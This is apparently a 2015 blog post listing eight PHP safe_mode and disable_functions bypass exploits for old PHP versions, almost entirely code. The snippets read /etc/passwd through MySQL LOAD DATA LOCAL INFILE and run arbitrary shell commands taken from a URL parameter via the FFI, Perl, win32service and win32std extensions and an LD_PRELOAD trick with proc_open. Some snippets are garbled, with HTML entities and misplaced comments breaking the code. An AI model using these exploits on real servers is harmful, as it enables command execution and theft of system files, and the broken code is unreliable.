PHP SAFE MODE BYPASS

1- PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability

<?php
file_get_contents('/etc/passwd'); 
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l); 
mysql_connect("localhost", "aaaa");
 mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $result = mysql_query("SELECT a FROM a.a"); 
while(list($row) = mysql_fetch_row($result)) 
print $row . chr(10); 

?>

2- MySQL

<?php
function r($fp, &$buf, $len, &$err) { 
print fread($fp, $len);
} 
$m = new mysqli('localhost', 'aaaa', '', 'a'); 
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1); 
$m->set_local_infile_handler("r"); 
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $m->close();
 
?>

3- PHP FFI Extension Safe_mode Bypass Exploit

<?php 
if(!extension_loaded('ffi')) 
die('ERROR: FFI extension is not loaded!'); 
$command=(empty($_GET['cmd']))?'dir':$_GET['cmd']; if(is_writeable(dirname(__FILE__)))
$tmp=dirname(__  FILE__); elseif(is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path'); elseif(is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir'); 
else die('ERROR: Move exploit to writeable folder.'); $output="$tmp\\".uniqid('NJ'); 
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$output\"",0); while(!file_exists($output))sleep(1); 
$con=''; $fp=fopen($output,'r'); while(!feof($fp))$con.=fgets($fp,1024); fclose($fp); $con=htmlspecialchars($con); 
echo "<pre>$con</pre>"; 
unlink($output); 
?>

4- PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypas

<?php 
if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
$path = str_repeat("..\\", 20); 
$MyBoot_readfile = readfile($path."windows\\system.ini"); 
#just to be sure that I set correctely disable_function 

:)

 
$MyBoot_ioncube = ioncube_read_file($path."boot.ini"); 
echo $MyBoot_readfile; 
echo "<br><br>ionCube output:<br><br>"; 
echo $MyBoot_ioncube; 
?>

5 – PHP Perl Extension Safe_mode Bypass

<?php 
if(!extension_loaded('perl'))die('perl extension is not loaded'); if(!isset($_GET))$_GET=&$HTTP_GET_VARS; 
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls  '; 
$perl=new perl(); 
echo "<textarea rows='25' cols='75'>"; 
$perl->eval("system('".$_GET['cmd']."')"); 
echo "</textarea>"; 
$_GET['cmd']=htmlspecialchars($_GET['cmd']); 
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>" 
?>

6- PHP 5.x (win32service) Local Safe Mode Bypass Exploit

<?php 
$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir';
#cammand 
$dir=ini_get('upload_tmp_dir'); 
#Directory to store command's output if(!extension_loaded('win32service'))die('win32ser  vice extension not found!'); 
$name=$dir."\\".uniqid('NJ'); 
$n=uniqid('NJ'); 
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; 
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); 
win32_start_service($n); 
win32_stop_service($n); 
win32_delete_service($n); 
$exec=file_get_contents($name); 
unlink($name); 
echo "<pre>".htmlspecialchars($exec)."</pre>"; 
?>

7 – PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

<?php 
if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd.exe"); 
//just to be sure that protections work well win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); 
?>

8- PHP safe_mode Bypass via proc_open() and custom environmen

<?php
$path="/var/www"; 
//change to your writable path 
$a=open($path."/.comm","w"); 
fputs($a,$_GET["c"]); 
fclose($a); 
$descriptorspec = array(  0--> array("pipe", "r"),  1 =&gt; array("file", $path."/output.txt","w"),  2 =&gt; array("file", $path."/errors.txt", "a" ) );
$cwd = '.'; 
$env = array('LD_PRELOAD' =&gt; $path."/a.so"); 
$process = proc_open('id &gt; /tmp/a', $descriptorspec, $pipes, $cwd, $env); 
// example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r"); 
echo "<strong>"; 
while (!feof($a)) {$b=fgets($a);echo $b;} fclose($a);
?>
posted @ 2015-04-28 11:58  剑残雪飘  阅读(812)  评论(0编辑  收藏  举报